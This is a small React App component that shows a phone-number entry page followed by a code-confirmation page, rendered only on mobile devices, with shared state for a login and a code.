import Navbar from "./Components/NavBar/NavBar";
import Number from "./Components/Contents/Number";
import Confirm from "./Components/Contents/Confirm";
import Footer from "./Components/Footer/Footer";
import { useState } from "react";
import { isMobile } from "react-device-detect";

export default function App() {
  const [ncode, setNcode] = useState({
    login: '',
    code: '',
  });
  const [page, setPage] = useState('p1');
  return (
    <div>
      {isMobile ? 
      <div>
        <Navbar />
        { page === 'p1' ?
        <Number setPage={setPage} setNcode={setNcode} ncode={ncode} />
        :
        <Confirm  setNcode={setNcode} ncode={ncode} />
        }
        <Footer />
      </div>
      : ""
      }
    </div>
  );
}